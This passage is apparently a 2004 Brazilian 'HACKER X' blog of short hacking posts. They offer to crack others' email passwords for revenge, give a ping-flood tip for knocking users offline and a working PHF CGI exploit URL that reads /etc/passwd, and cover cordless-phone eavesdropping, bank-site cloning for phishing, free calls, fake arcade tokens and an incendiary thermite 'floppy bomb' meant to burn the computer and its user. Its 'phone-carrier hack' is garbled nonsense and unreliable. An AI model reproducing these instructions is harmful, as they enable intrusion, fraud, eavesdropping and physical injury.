o "ENTER" do seu Teclado rapidamente ate aparecer um comunicado do BOL,
dizendo que o E-mail foi Bloqueado!!!!

OBS: O BOL PEGARA O SEU "IP" ENTÇO CUIDADO!!!

Mais informações E-mail: jaimealvesveras@bol.com.br

_______________________________________________

DESCOBRINDO SENHA DE E-MAIL!

Eu Hacker X consigo descobrir qualquer Senha de E-mail como BOL, HOTMAIL, IG
ZIPMAIL, YAHOO , IBEST , UOL , GLOBO e etc...

Mas como faço para descobrir a Senha de E-mail de alguem?

1 - MANDE UM E-MAIL PARA jaimealvesveras@bol.com.br pedindo que eu descubra a
senha de algum amigo ou etc...

obs: eu so descubro as senhas se for alguma coisa de "VINGANÇA"
ou simplesmente "URGENCIA"

2 - DEPOIS MANDE ALGUMA DECLARAۂO DE AMOR PARA MIM, mas so se for mulher e
"CLARO".

3 - MANDE O E-MAIL DA PESSOA PARA MIM DESCOBIR A SENHA!!!

OBS: DEPOIS DE 3 DIAS EU MANDAREI A SENHA PARA O SEU E-MAIL!
OBS: OS HOMENS VÇO TER QUE MANDAR IMAGENS INGRAÇADAS...

_______________________________________________




  Escrito por HACKER X às 16h26
[ (5) Vários Comentários] [ envie esta mensagem ]




DICAS NBTSTAT
____________________________


NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n]
    [-r] [-R] [-s] [S] [interval] ]
 -a (adapter status) Lists the remote machine's name table given its name
 -A (Adapter status) Lists the remote machine's name table given its
                 IP address.
 -c (cache)          Lists the remote name cache including the IP addresses
 -n (names)            Lists local NetBIOS names.
 -r (resolved)        Lists names resolved by broadcast and via WINS
 -R (Reload)           Purges and reloads the remote cache name table
 -S (Sessions)          Lists sessions table with the destination IP addresses
 -s (sessions)         Lists sessions table converting destination IP
                 addresses to host names via the hosts file.

 RemoteName Remote host machine name.
 IP address Dotted decimal representation of the IP address.
 interval Redisplays selected statistics, pausing interval seconds
         between each display. Press Ctrl+C to stop redisplaying
         statistics.

_____________________________
DICAS TRACERT

Tracert [-d] [-h nmax_saltos] [-j lst_hosts] [-w tempo_limite] destino

Opções:

   -d           NÆo resolver endere‡os para nomes de hosts.
   -h nmax_saltos N£mero m ximo de saltos para a procura do destino.
   -j lst_hosts  Rota ampliada de origens usada com a lista lst_hosts.
   -w tempo_limite Tempo de espera em milissegundos para cada resposta.

_____________________________

DICAS PING

Ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
         [-r count] [-s count] [[-j host-list] | [-k host-list]]
         [-w timeout] destination-list

Opções:
  -t           Fazer ping para o host especificado at‚ parada.
               Para ver estat¡sticas e continuar - digite 'Control-Break';
               Para parar - digite 'Control-C'.
   -a          Resolver endere‡os para nomes de hosts.
   -n count       N£mero de pedidos de eco para envio.
   -l size      Enviar tamanho do buffer.
   -f          Definir sinalizador 'NÆo fragmentar' no pacote.
   -i TTL        Time To Live.
   -v TOS         Tipo de servi‡o.
   -r count      Registrar rotas para saltos de contagem.
   -s count       Marca de hora para saltos de contagem.
   -j host-list Rota ampliada de origens usada com host-list.
   -k host-list Rota restrita para host-list.
   -w timeout Marca de hora em milissegundos para aguardar cada resposta.

____________________________

DICAS FTP

Transfere arquivos entre computadores executando o serviço
servidor FTP (tambem chamado daemon). Pode ser usado interativamente.

FTP [-v] [-d] [-i] [-n] [-g] [-s:nome_arq] [-a] [-w:tam_buffer] [-A] [host]

 -v       Não utiliza a resposta de servidores remotos.
 -n       Não utiliza auto-login na conexão inicial.
 -i      Desativa o prompt interativo durante a transferˆncia
         de v rios arquivos.
 -d       Ativa a depuração.
 -g       Desativa mascaramento de nomes de arquivos (ver comando GLOB).
 -s:nome_arq Especifica um arquivo texto contendo comandos FTP; os
         comandos são executados automaticamente apos o inicio do FTP.
 -a       Efetua login an“nimo.
 -w:tam_buffer Ignora o tamanho de transferencia padrão do buffer de 4096.
 -a       Utiliza uma interface local ao ligar a conexão de dados.
 host      Especifica o nome do host ou endereço IP do host
         remoto para conexão.

____________________________




  Escrito por HACKER X às 16h22
[ (0) Comente] [ envie esta mensagem ]




PARA NÃO SER INVADIDO!
______________________


VA EM LOCALIZAR E EM SEGUIDA DIGITE: vnbt.386, quando achar mude para vnbt.bak

vnbt.386 para vnbt.bak
______________________________________
ENTRANDO INVISIVEL EM SITES E HOME PAGES!

Comando que não deixa a HOME PAGE pegar o seu IP e as suas informações!

http://proxy.spaceproxy.com/-_-http://endere‡o

_______________________________________

Pegando o ip de alguem!

PING/-T OU PING/ -T

_______________________________________

Derrubando um "INTERNAUTA" da Internet!!!
________________________________________

Para derrubar um cara da Internet e simples.

Abra o PROMPT-MS-DOS e digite:

PING -N 1000 IP

Ex: PING -N 1000 192.165.2.5

Sabendo que o 1000 e o tanto de Pacotes que vc vai enviar...
________________________________________

INVADIR VIA BROWSER

ESTE METODO NÇO E MUITO UTILIZADO HOJE EM DIA NÇO, POIS OS SERVIDORES DE
SITES
JA CONSERTARAM O BUG, MAS EM ALGUNS SITES ONDE A SEGURANÇA E FRACA
AINDA SE
CONSEGUE ALGUMAS INVESTIDAS USANDO ESTE COMANDO.
TROQUE O XXX.XXX.XXX - PELO ENDEREÇO DO SITE A HACKEAR.

http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

ATENÇÃO: SE APARECER PAGINA "CANCELADA" E PORQUE O SERVIDOR JA
CONSERTOU O
BUG...
__________________________________________




  Escrito por HACKER X às 16h18
[ (2) Vários Comentários] [ envie esta mensagem ]


09/02/2004


2 USUARIOS ONLINE

para conversar digite "a" com

extenção "t"




  Escrito por HACKER X às 20h30
[ (0) Comente] [ envie esta mensagem ]




INVADINDO OPERADORA DE CELULAR (VIVO)
_________________________________________




COM ESTA INVASAO VC PODE HABILITAR UM CELULAR NO PROPRIO SISTEMA DA
VIVO OU
MUDAR O NOME DO PROPRIETARIO DO CELULAR OU ATE MESMO BLOQUEAR O
CELULAR
DE ALGUM AMIGO SEU, OU UM INIMIGO...


EU VOU ENSINAR COMO INVADIR A OPERADORA (VIVO)!

FERRAMENTAS!!!


1 - PROMPT MS-DOS


Pronto ja tem tudo, vamos la...

Abra o Ms-dos e digite: set
depois DEBUG e digite:

-o 01 02
-o 02 03
-UF
-q

VC TEM QUE SABER O IP DA VIVO, ABRA O MS-DOS E DIGITE: PING
WWW.VIVO.COM.BR
SE O SITE ESTIVER CONECTADO VAI APARECER O IP!!!

SALVE O IP NO MS-DOS NO DIRETORIO C: COM O NOME DE DEBUG.SYS, PARA
SALVAR NO
MS-DOS:

COPY CON DEBUG.SYS
DEPOIS DIGITE O IP EX: 192.165.5.0
APERTE CTRL Z
E APERTE ENTER PRONTO ESTA SALVO

DEPOIS DE SALVO DIGITE NO MS-DOS:

DEBUG
e depois...

-U F
e depois

-o 11 11
e depois

-o 12 24
e depois

-o 78 78
e depois

-o 50 ff
e depois

-o ff aa
e depois

-q

VC FAZ ISSO PARA MAPEAR O SISTEMA!!!

VA EM "INICIAR" E DEPOIS "EXECUTAR" E DIGITE: NBTSTAT -A IP DA VIVO. E CLIQUE
OK SE APARECER "HOST NOT FOUND" VC ESTA INDO NA LINHA CERTA.
AGORA ABRE O MS-DOS E DIGITE:

DEBUG
e depois

-U 20 20
e depois

-U 30 30
e depois

-U 00 00
e depois

-U 00 01
e depois

-T 5120

O SEU COMPUTADOR IRA MAPEAR TODOS OS COMPUTADORES QUE ESTAO
LIGADOS NA VIVO
VAI DEMORAR CERCA DE UNS 3 A 4 MINUTOS.

DEPOIS DE MAPEADO DIGITE:

-q

____________________________________________________________________________
NA PARTE PRATICA EU ENSINEI AS PARTES MAIS FACEIS DA INVASAO!
MAS NA DIFICIL EU PARO POR AQUI, SE QUIZER SABER O RESTO DA INVASAO MANDE
UM

E-MAIL PARA: jaimealvesveras@bol.com.br

OU LIGUE PARA: (63) 217-4440 OU (63) 217-5662

OBS: SE ALGUEM TE PEGAR NEM LEMBRE DE MIM FALOU. PORQUE ESTE TEXTO E
UM TEXTO
INFORMATIVO OU SEJA NUNCA ESQUECA: EU NAO TENHO NADA AVER COM ISSO!!!!!
___________________________________________________________________________

MAS EMBREVE NO WWW.HACKERX.ZIP.NET COMO INVADIR A OPERADORA CLARO E
TIM !!!
____________________________________________________________________________

            PIOR HOME PAGE 2004

PIOR HOME PAGE DA INTERNET: WWW.MAURICIOOPODEROSO.BLOGGER.COM.BR

SE VC QUIZER ACHAR GRA€A DAS VIADAGENS DESTE SITE PODE ENTRAR E DAR
UMA
ESPIADA... HA HA HA HA HA HA HA HA !!!!!
  Escrito por HACKER X às 19h44
[ (1) Apenas 1 comentário] [ envie esta mensagem ]




ARRUMANDO CELULAR SEM SERVIÇO
_____________________________

NOKIA: 5125, 1220, 3320.

ESTE TEXTO FOI DIGITADO POR GUSTAVO!
_____________________________

Quando seu Celular estiver sem serviço basta ler este pequeno texto...

Quando na tela do seu vizor aparecer "SEM SERVIÇO" digite o seguinte codigo

#1329#* depois pressione Chamar...
se for um 5125 aparecera o System id, so basta confirmar...
se for um 1220 aparecera Numero do celular
se for um 3320 aparecera Numero do Celular

Quando aparecer "Numero do Celular" digite o numero do seu celular e retire
um numero nove Ex: seu numero e 9966 - 0873, retire um nove que ficara:
966 - 0873, e digite seguido do DDD ex: 63 966 - 0873, e pressione Ok!

O CELULAR IRA DESLIGAR E RELIGAR AUTOMATICAMENTE, se ainda nÆo voltar a ter
servi‡o ligue para a sua operadora...

NUMEROS:

VIVO : 1404

CLARO: 1281 OU 0800 036 36 36

____________________________________________
  Escrito por HACKER X às 19h42
[ (0) Comente] [ envie esta mensagem ]




PHREAK - TELEFONIA
__________________

1 - Para ouvir conversas dos outros

Telefones sem Fio:

Caso voce tenha um telefone sem fio, podera ouvir as conversas dele em radio
FM. E so vc ligar e discar para qualquer pessoa e procurar no radio.
Ate sintonizar a mesma frequencia do telefone.

AQUI VAO ALGUMAS FREQUENCIAS JA TESTADAS:

PANASONIC
KX-T3908-
93,3MHz

PANASONIC
KK-T4550-
93,3MHz

MAIS INFORMAیES LIGUE PARA:
____________________________

(63)217-4440 > FALAR COM GUSTAVO

(63)217-5662 > FALAR COM GUSTAVO

E-MAIL: jaimealvesveras@bol.com.br
_____________________________




  Escrito por HACKER X às 19h40
[ (0) Comente] [ envie esta mensagem ]




CONECTANDO NOTBOOKS A TELEFONES PUBLICOS

NÃO SE ESQUEÇA QUE ESTE TEXTO É UM TEXTO INFORMATIVO OU SEJA EU NÃO
TENHO NADA
HAVER COM ISSO!!!


FERRAMENTAS:

1§ - ALICATE
2§ - NOTBOOK

O processo para conectar notbooks a telefones publicos ‚ muito facil.
O conector do notbook que segue o estilo Jack, tem quatro fios dentro dele.
Arranque o conector de plastico transparente que fica na ponta do fio.
Pegue os dois fios centrais e separe-os dos fios das extremidades.
Estes dois fios Centrais, sao os que serao utilizados para fazer a liga‡Æo no
orelhÆo.
Depois de ligado os fios no orelhÆo basta conectar-se a BBS`s da mesma forma
que voce se conecta em casa.
Caso vc queira testar se esta tudo OK, abra um programa de terminal qualquer
e digite o comando "ATA" (sem as arpas).
Se fizer um barulhinho parecido com o tom da linha e que esta tudo Ok!!!
  Escrito por HACKER X às 19h39
[ (0) Comente] [ envie esta mensagem ]




3 CODIGOS DE CELULAR NOKIA
________________________

Consta neste documento 3 codigos principais para celulares Nokia da serie:
51--- 61---- e que tambem funcionam em alguns outros MODELOS....
____________________________________________________________________

* 3001#12345#

O Principal deste codigo e porque ele contem a programa‡Æo do celular como:

NAN 1, 2 ,3...
ESN
EMERGENCY
SECURITY
SW VERSION
SERIAL NO.
FIELD TEST

_______________________________________________________________________

*#92772689#

Este codigo nÆo e muito importante mais ele e usado para quem tem ou comprou
o cabo "WARRANTY"

SERIAL NO.
LIFE TIME
REPAIRED
_________________________________________________________________________

*#7370

Este codigo e muito importande para quem quer vender um celular, porque ele
apaga toda a agenda, ringtones, pessoais, pontua‡Æo dos jogos, ultimos numeros
discados, recebidos, etc...
DEIXA O CELULAR COMO VEIO DA FABRICA!

__________________________________________________________________________

SE VC QUIZER APRENDER COMO CLONAR CELULAR !

Mande um E-mail: jaimealvesveras@bol.com.br

WWW.HACKERX.ZIP.NET

SEMPRE TRAZENDO NOVIDADES PARA OS HACKER`S!!!

___________________________________________________________________________




  Escrito por HACKER X às 19h34
[ (2) Vários Comentários] [ envie esta mensagem ]




Quebrando a Senha de Bios!

Esqueceu a Senha de Bios?
Eu tenho a solução!

No Prompt MS-DOS Digite:

Debug
pressione Enter...
-o 70 2e

pressione Enter...

-o 71 ff

pressione Enter

-q

pressione Enter...

Pronto a Senha de Bios esta Totalmente Quebrada!!!

Este texto foi feito Por mim GUSTAVO, se quizer entrar em contato comigo ligue
para (63) 217-4440 ou 217-5662.
Ou mande um E-mail: jaimealvesveras@bol.com.br




  Escrito por HACKER X às 10h33
[ (0) Comente] [ envie esta mensagem ]




____________________
COMO CLONAR SITES!!!

EU Não TENHO NADA AVER COM ISSO SE VC CLONAR UM SITE DE BANCO AZAR E
SEU DEPOIS
Não VEM DIZER QUE FUI EU FALOU.

ESTE TEXTO E UM TEXTO INFORMATIVO, DIGITADO POR MIM!!!


EU VOU ENSINAR COMO CLONAR SITES PELO BLOGGER.
HTTP://WWW.BLOGGER.COM.BR
PRIMEIRO ENTRE NO SITE QUE VC QUER CLONAR EX: HTTP:// WWW.BOL.COM.BR
DEPOIS Vµ NO MENU "EXIBIR" "CODIGO DE FONTE". COPIE TODO O CODIGO DE
FONTE DO
SITE, E SALVE O CODIGO DE FONTE NO "WORD". AGORA ENTRE NO SITE
WWW.BLOGGER.COM.BR SE CADASTRE E CLIQUE EM CRIAR SITE, QUANDO VC
ESTIVER DENTRO
DO EDITOR BLOGGER CLIQUE EM: !TEMPLATE! QUANDO ESTIVER DENTRO DO
TEMPLATE DELETE
O CODIGO DE FONTE DO BLOGGER, DEPOIS DE DELETADO ABRA O CODIGO DE
FONTE QUE VC
TINHA SALVADO NAQUELA HORA SELECIONE TUDO E JOGUE NO TEMPLATE DO
BLOGGER !

DEPOIS Vá LA EMBAIXO DO TEMPLATE E ESCREVA:

<Blogger>
</Blogger>

NÆo esqueça Que o B do Blogger tem que ser MAIUSCULO COMO DIGITADO!!

Clique em Salvar Alterações. Depois de Salva clique em "Post" e digite qualquer
coisa e clique em Salvar e Publicar.

Pronto clique agora em ver Blogger!

VC VAI VER O SITE QUE VC CLONOU!!!!!!!!!!!!!!!!!!!!!

Mais informações: E-mail: jaimealvesveras@bol.com.br




  Escrito por HACKER X às 10h25
[ (1) Apenas 1 comentário] [ envie esta mensagem ]
ME AJUDEM POR FAVOR!!!

BIOS Não RECONHECE HD!

Eu tenho um Computador: CPU INTEL 133, CONTENDO: FLOP - HD 1.2 GB/FONTE/ PLA-
CA DE VIDEO, DOIS PENTES DE MEMORIA.
A Bios do meu computador não reconhece o HD, eu acho que e a Bios que não es-
DISQUETE BOMBA


              Um ou mais discos de 1.44 Mb;
              - Uma caixa de fósforo, azul ou branco SOMENTE;
              - Um estilete bem afiado;
              - Um frasco de cimento plástico ou argamassa;
              - Um centímetro de magnésio em tiras (opcional);
              - Um grama de termite (mistura de alumínio pulverizado e
              óxido de ferro (opcional)).

              Instruções

              Abra cuidadosamente o disquete. Com o disco aberto
              você tem de escolher entre arrancar a proteção onde fica
              a marca do disco (normalmente de metal), ou deixá-la no
              lugar. Se a proteção for arrancada, a bomba vai ficar
              visível e você mesmo terá de colocá-la no drive. Se a
              proteção ficar no lugar, você pode dar o disco para um
              "amigo". Raspe a cabeça dos fósforos e amasse para que
              vire um pó. Retire o pano do disquete e cubra um ou
              ambos os lados do disco com argamassa. Espalhe o pó
              dos fósforos em cima e deixe secar. Feche o disco
              colocando os cantos e pronto. Se você quiser um estrago
              maior, coloque a tira de magnésio em cima do pó dos
              fósforos. Se você quiser destruir o computador, coloque o
              termite embaixo do magnésio.

              Funcionamento

              Quando o disco for acessado, o pó dos fósforos irá atritar
              e acender. O disco vai derreter e se espalhar pelo drive.
              Se você usou o magnésio, o calor gerado pelos fósforos
      vai acender a tira. O magnésio vai queimar destruindo o
      drive permanete e, com sorte, outras coisas mais que
      estiverem por perto. Se você usou o magnésio e o termite
      juntos, o magnésio irá acender o termite e ele vai começar
      a agir. O termite vai queimar o disco, o drive, o gabinete, a
      mesa, o chão, o quarto e o usuário.




     Escrito por HACKER X às 10h13
   [ (0) Comente] [ envie esta mensagem ]




Ligando de telefone celular sem pagar
       Peguemos o exemplo do número 9876-5432 de um
       celular.

      Este número é apenas um exemplo. Eu nem sei se existe
      e se existe eu nem conheço o dono. Não vá ligar pra ele e
      pedir informações !

      Então devemos pegar o último número do telefone a ser
      discado, no caso o 2. Subtraímo-no de 10, o que vai
      resultar no número 8. Somente acrescentemos este
      número ao final do número discado. O resultado será:

      Número ligado sem pagar: 9876-5432-8
Não teste isso como um louco, faça uma ou duas ligações
que realmente sejam significantes no valor e espere a
conta telefônica.




  Escrito por HACKER X às 10h12
[ (0) Comente] [ envie esta mensagem ]




Fliperama Grátis




Materiais

- Tampas de garrafa;
- Vela branca e grossa;
- Faca bem afiada;
- Uma ficha de fliperama original.

Preparo

Corte a vela em pequenas rodelas parecidas com a ficha.
Amasse bem as tampinhas de modo que fiquem bem finas
e então coloque as lâminas metálicas dentro das rodelas
da vela. Não se esqueça de dar o formato das entradas
moldados na cera. Então deixe-as no refrigerador por
umas 5 horas até ficarem bem duras.

Ah, seja discreto pra não deixar o dono do fliperama ver,
principalmente se você usar ests técnica mais de uma
vez.

								
To top